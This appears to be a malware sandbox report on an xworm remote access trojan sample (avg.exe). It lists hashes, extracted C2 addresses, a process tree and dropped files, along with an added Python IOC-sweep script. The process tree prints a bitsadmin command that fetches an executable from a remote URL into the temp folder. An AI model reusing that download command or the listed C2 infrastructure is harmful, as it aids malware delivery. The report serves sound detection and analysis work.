Analysis

  • max time kernel
    383s
  • max time network
    398s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240910-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06-10-2024 17:30

General

  • Target

    avg.exe

  • Size

    51KB

  • MD5

    c523062e513acd24dcc7e9359f34bffb

  • SHA1

    5aa43c875ee2e8645ef4206df755dd22013c0173

  • SHA256

    02fdfbf888ed7f389c70d2afd74f6f04e4cf78ad35afa4ad5cd117899e8fcb74

  • SHA512

    2c953d6337a7b932a66146034082d2f58894895ed798ed0e8d417690458319ab776bc381e1aa2d45574d1e35b1b1c04c3f990c21adbe4f587bbbaa5ba165cacf

  • SSDEEP

    768:mdKpmtBsOH18MjV/WybXgxXbkb03OTSi/yuxwoQOphA3W1t9:my6T3/rbXskb03O1/yuxXQOpm3A9

Malware Config

Extracted

Family

xworm

C2

147.185.221.16:40164

147.185.221.20:40164

Attributes
  • install_file

    System Volume Information Prefetch.exe
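
The extracted configuration above is enough to write an IOC sweep. The Python below is an added example, not code from the report or from any analysis tool: it takes the two C2 endpoints, the install filename and two of the SHA256 values reported for this run and checks them against constructed firewall lines and file records. The log format, the source hosts, the install directory under AppData\Roaming, and the "unexpected port" and lookalike-name heuristics are assumptions for illustration, not findings of the report.

```python
# Added example, not part of the sandbox report: the extracted xworm
# configuration as an IOC set, swept over constructed log records.
from dataclasses import dataclass

# C2 endpoints and install filename exactly as extracted in the report.
C2_ENDPOINTS = {("147.185.221.16", 40164), ("147.185.221.20", 40164)}
INSTALL_FILE = "System Volume Information Prefetch.exe"

# SHA256 values from the report: the submitted sample and the dropped dropper.
KNOWN_SHA256 = {
    "02fdfbf888ed7f389c70d2afd74f6f04e4cf78ad35afa4ad5cd117899e8fcb74": "avg.exe (xworm)",
    "80e8b7030e205c526c5d0eea0abd680d8cacaf3f86d6dc6a3e7081f927b13215": "TheDropper.exe",
}


@dataclass
class Hit:
    source: str      # "network" or "file"
    confidence: str  # "high" or "medium"
    detail: str


def parse_conn_line(line):
    """Parse one constructed 'key=value' firewall line into a dict."""
    return dict(kv.split("=", 1) for kv in line.split())


def sweep_connections(lines):
    """Flag outbound connections to the configured C2 endpoints."""
    c2_hosts = {host for host, _ in C2_ENDPOINTS}
    hits = []
    for line in lines:
        f = parse_conn_line(line)
        dst, dport = f["dst"], int(f["dport"])
        if (dst, dport) in C2_ENDPOINTS:
            hits.append(Hit("network", "high", f"{f['src']} -> {dst}:{dport} matches xworm C2"))
        elif dst in c2_hosts:
            # Same host on another port: operators rotate ports, so keep the
            # hit but at lower confidence (assumption, not from the report).
            hits.append(Hit("network", "medium", f"{f['src']} -> {dst}:{dport} C2 host, unexpected port"))
    return hits


def sweep_files(records):
    """Flag file records whose hash or name matches the report's IOCs."""
    hits = []
    for r in records:
        name = r["path"].rsplit("\\", 1)[-1]
        digest = r.get("sha256", "").lower()
        if digest in KNOWN_SHA256:
            hits.append(Hit("file", "high", f"{r['path']} hash matches {KNOWN_SHA256[digest]}"))
        if name.lower() == INSTALL_FILE.lower():
            hits.append(Hit("file", "high", f"{r['path']} uses the xworm install filename"))
        elif name.lower().endswith(".exe") and "system volume information" in name.lower():
            # Generalisation (assumption): any executable borrowing the name of
            # the protected 'System Volume Information' folder is suspicious.
            hits.append(Hit("file", "medium", f"{r['path']} mimics a protected Windows folder name"))
    return hits


# Constructed sample telemetry; the install directory and source hosts are
# assumptions, only the C2 addresses, filename and hashes come from the report.
SAMPLE_CONN_LOG = [
    "src=10.0.0.15 dst=147.185.221.16 dport=40164 proto=tcp",
    "src=10.0.0.15 dst=147.185.221.20 dport=443 proto=tcp",
    "src=10.0.0.15 dst=93.184.216.34 dport=443 proto=tcp",
]
SAMPLE_FILES = [
    {"path": r"C:\Users\Admin\AppData\Roaming\System Volume Information Prefetch.exe", "sha256": "0" * 64},
    {"path": r"C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe",
     "sha256": "80e8b7030e205c526c5d0eea0abd680d8cacaf3f86d6dc6a3e7081f927b13215"},
    {"path": r"C:\Windows\System32\notepad.exe", "sha256": "1" * 64},
]

if __name__ == "__main__":
    for hit in sweep_connections(SAMPLE_CONN_LOG) + sweep_files(SAMPLE_FILES):
        print(f"[{hit.confidence:6}] {hit.source}: {hit.detail}")
```

The report gives only the install filename, not the directory xworm writes it to, which is why the file rule keys on the name alone; the hash rule is the one to trust for the two binaries the report actually fingerprints.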

Signatures

  • Detect Xworm Payload 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Download via BitsAdmin 1 TTPs 1 IoCs

    bitsadmin.exe /transfer is launched from output.bat (via cmd.exe) to fetch https://github.com/uwhf/blank/blob/main/test.exe into %TEMP%. The URL is a GitHub /blob/ page rather than a raw-file URL, so a completed transfer would save the repository's HTML page, not the executable; no test.exe appears among the dropped files below.
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other sensitive information.

  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Opens file in notepad (likely ransom note) 3 IoCs

    Heuristic match only: in this run Notepad opened a.txt, output.bat and output.cmd from the Desktop, which are text and script files rather than ransom notes, consistent with interactive handling of the extracted Compiled_Project.zip rather than with malware behaviour.
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\avg.exe
    "C:\Users\Admin\AppData\Local\Temp\avg.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1628
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:1008
  • C:\Users\Admin\Desktop\avg.exe
    "C:\Users\Admin\Desktop\avg.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1100
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a.txt
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:2252
  • C:\Program Files\7-Zip\7zG.exe
    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap6867:90:7zEvent17961
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3412
  • C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe
    "C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    PID:408
  • C:\Windows\System32\NOTEPAD.EXE
    "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Compiled_Project\output.bat
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:3880
  • C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe
    "C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    PID:1812
  • C:\Windows\System32\NOTEPAD.EXE
    "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Compiled_Project\output.cmd
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:4772
  • C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe
    "C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2612
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hqiwwomd\hqiwwomd.cmdline"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1052
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6E4D.tmp" "c:\Users\Admin\Desktop\Compiled_Project\CSC173AA8D924934FCABDCC4C7BD0439.TMP"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5112
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Compiled_Project\output.bat" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4224
    • C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer "mdj" /download /priority FOREGROUND "https://github.com/uwhf/blank/blob/main/test.exe" "C:\Users\Admin\AppData\Local\Temp\\test.exe"
      2⤵
      • Download via BitsAdmin
      PID:3540

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TheDropper.exe.log

      Filesize

      1KB

      MD5

      6df2f9d8bae5cf10e5f71b15078141c9

      SHA1

      64163e2f7b6b205e19753d257ebe2222b1a5cabc

      SHA256

      28c4c6492165483314006723b9384b03921a26a10480b430ef2e8382e5782da8

      SHA512

      9b35546a56a3a76a0aba591b1e97134fe4168ec435ea3e0772520cf1aec1f62da94e8cc4da6d70de8b9001f336df7a73314afc10ec710bb0a3b4354e99896bc2

    • C:\Users\Admin\AppData\Local\Temp\RES6E4D.tmp

      Filesize

      1KB

      MD5

      18b9707c9db11429792b4cbbea4ca239

      SHA1

      4adb5b2ef99bc2f01cfa8fba15df3b70506040bd

      SHA256

      1fce377a9a45f0eaafc040d54fa21b835115acf1ed98b6b7d55213f343ce441c

      SHA512

      8476c9f6d9666a01290325f130b1cc8da2a8ec99aefb3d6e4b9a4889188cd5e1ca7668305c64f87042a4253ab7216ab1c36bc7d2ff7b56779cb86b0f39c116df

    • C:\Users\Admin\Desktop\Compiled_Project.zip

      Filesize

      52KB

      MD5

      ef33fc09ca18c8d3e01ae1dd7ce1f7da

      SHA1

      f74e2a033c4ca904c86a37eb536ca77c42db3b8a

      SHA256

      94460534a0d75a84ba6adbc657fc112a2e8d13924b377bfb295a8a98f6cf5683

      SHA512

      80e5701ca4dbe46bd1602a275223dc0014cfc21293823df348f613058aaaa3f415c4482cb5c0135300a4a66754693091db91851b315d2b421d56171928d01edd

    • C:\Users\Admin\Desktop\Compiled_Project\TheDropper.exe

      Filesize

      149KB

      MD5

      95861defb10a7d2a8012c3e0b1b9447d

      SHA1

      e959f88bcb26bde9074fa5a8e447a77a57514b41

      SHA256

      80e8b7030e205c526c5d0eea0abd680d8cacaf3f86d6dc6a3e7081f927b13215

      SHA512

      ddbdc019baed346abc3d8518f19228826d4656b668808134cc710f82b60d2f337683f794c5e0a6036e272077d02abff51d1d03a4c5852eda5ac2f19ebf27320c

    • C:\Users\Admin\Desktop\Compiled_Project\output.bat

      Filesize

      209B

      MD5

      bf0f1300f5d8138b367b8febff230b88

      SHA1

      46750bf8b2a0138ab5a41ccd7b9f760bff97d021

      SHA256

      d7c39b400b5d4aa4700e801842a9600725a187306643354b7dabd99863819eba

      SHA512

      0658e76096fb83e861b4596ff66791a31a4d96df481919ab42ae3539ffad6d8022f1889fc7514f35ad90cd72d566fc6cf73f4eb6135f52fb6e74d496967ec3f2

    • C:\Users\Admin\Desktop\Compiled_Project\output.exe

      Filesize

      4KB

      MD5

      9c1bc2b29b708a8bf535a7edca43262b

      SHA1

      d164baa5f5992bd1d04f6fcacb8893cbc7ca8da4

      SHA256

      51edd02b6b8faa398a0fc7c0cd211f53bbc9e22fcc0dcfda499950ce18a9da54

      SHA512

      44d05213f8caba7671cb930e5aeff889b6ce6afc1a08f4c274f20e9c3a2bfee099d9ffffcdd616983cd465680f4c563b921fdcc5e43669fb7b00bafcb632b782

    • C:\Users\Admin\Desktop\Compiled_Project\plugin.dll

      Filesize

      5KB

      MD5

      c0d1f52e3b18132112b2b0fc67421596

      SHA1

      20a995e7b4ffee23ef249633275fc87ea77fbeb7

      SHA256

      972d708e74268122a4816f27cce4d00015e586b983c4ce2eee5889f45687f728

      SHA512

      d65ec29e43be269b397958a6e46427e096159f7f7cac1edb82fbc7148cbee7159d5ba97eb2009a235defa41c3ada4764e0584bc3f1e086001711c6140331f86b

    • C:\Users\Admin\Desktop\a.txt

      Filesize

      52B

      MD5

      a619f5a064016385e17548a302bc6467

      SHA1

      2c6134f05349283510b7a8846974681f56fba60c

      SHA256

      dc235543d5a7bd76875275db9bb0516d54a9465a89124e080e5b32938a8aaea1

      SHA512

      477220bd7a25dcfdc99ff846025b61f59e2ce79e6ede1eb68ba112982aded0b36167253389425f7ef6858c0faa21ab9a9f0fac13314596530e3136aa688e4e41

    • \??\c:\Users\Admin\AppData\Local\Temp\hqiwwomd\hqiwwomd.0.cs

      Filesize

      1KB

      MD5

      0f7dddf42fb4dcf0c5e286cb532a0f9f

      SHA1

      be51bc556a5c1c0d2e87742f9e8a992ad605ce30

      SHA256

      0398acb6380407a122988fdd46bb55544131581ff360e1d0fdd6df128f1319d6

      SHA512

      a4f1f11168cc702e957f472fe7661ca61486450bc29664b80d2d93f6c64e0c62bdb35fc895795b30f7b8977eabdc43608da1390a5b29a041aea4eaa23e7d8f73

    • \??\c:\Users\Admin\AppData\Local\Temp\hqiwwomd\hqiwwomd.cmdline

      Filesize

      184B

      MD5

      32ace708ff976961ec706b1eed0bc002

      SHA1

      2593f0a56cb1c98bd74d72e2b2f99aedb6c11b1e

      SHA256

      72164b42f305ec86c8f0f15cc5b96acc2b3c9b4cb7572d3f9dcf25975a5f908c

      SHA512

      58d45347b27fd935d8fcb14236f01263c8cdacf11c671d0d5f68c8225ea01cae3460098ce44b44e9c0ab6a72474a33b3cc17c88741ddb296587bc13deacf8958

    • \??\c:\Users\Admin\Desktop\Compiled_Project\CSC173AA8D924934FCABDCC4C7BD0439.TMP

      Filesize

      1KB

      MD5

      2c8070f084ff635f9e016b831cd6ef16

      SHA1

      84d8287a21eaf176ebd7b3efe8571b3862de873a

      SHA256

      535d007133ddae112030480aac0b6954d4aac98bcd69b0ef192a010770564a4f

      SHA512

      f7dd550984e579912cf8fa688c53985308862954688b44482c83c05d61274519812a5ea9b6ddcfcd8972d117c8e3edfa6da0e23f3c8ea17ef0bdab80bf0d4c1f

    • memory/408-62-0x0000000000390000-0x00000000003BC000-memory.dmp

      Filesize

      176KB

    • memory/408-71-0x0000000005F50000-0x0000000005F58000-memory.dmp

      Filesize

      32KB

    • memory/408-66-0x00000000081F0000-0x0000000008266000-memory.dmp

      Filesize

      472KB

    • memory/408-65-0x0000000004DC0000-0x0000000004DCA000-memory.dmp

      Filesize

      40KB

    • memory/408-63-0x0000000005390000-0x0000000005934000-memory.dmp

      Filesize

      5.6MB

    • memory/408-64-0x0000000004DE0000-0x0000000004E72000-memory.dmp

      Filesize

      584KB

    • memory/1100-6-0x00007FFE02450000-0x00007FFE02F11000-memory.dmp

      Filesize

      10.8MB

    • memory/1100-4-0x00007FFE02450000-0x00007FFE02F11000-memory.dmp

      Filesize

      10.8MB

    • memory/1628-0-0x00007FFE02453000-0x00007FFE02455000-memory.dmp

      Filesize

      8KB

    • memory/1628-48-0x000000001D660000-0x000000001D710000-memory.dmp

      Filesize

      704KB

    • memory/1628-47-0x000000001D2E0000-0x000000001D302000-memory.dmp

      Filesize

      136KB

    • memory/1628-49-0x000000001DE40000-0x000000001E368000-memory.dmp

      Filesize

      5.2MB

    • memory/1628-8-0x000000001CF70000-0x000000001D08E000-memory.dmp

      Filesize

      1.1MB

    • memory/1628-7-0x000000001CC20000-0x000000001CF70000-memory.dmp

      Filesize

      3.3MB

    • memory/1628-3-0x00007FFE02450000-0x00007FFE02F11000-memory.dmp

      Filesize

      10.8MB

    • memory/1628-2-0x00007FFE02450000-0x00007FFE02F11000-memory.dmp

      Filesize

      10.8MB

    • memory/1628-1-0x0000000000FF0000-0x0000000001004000-memory.dmp

      Filesize

      80KB

    • memory/2612-93-0x0000000005F60000-0x0000000005F68000-memory.dmp

      Filesize

      32KB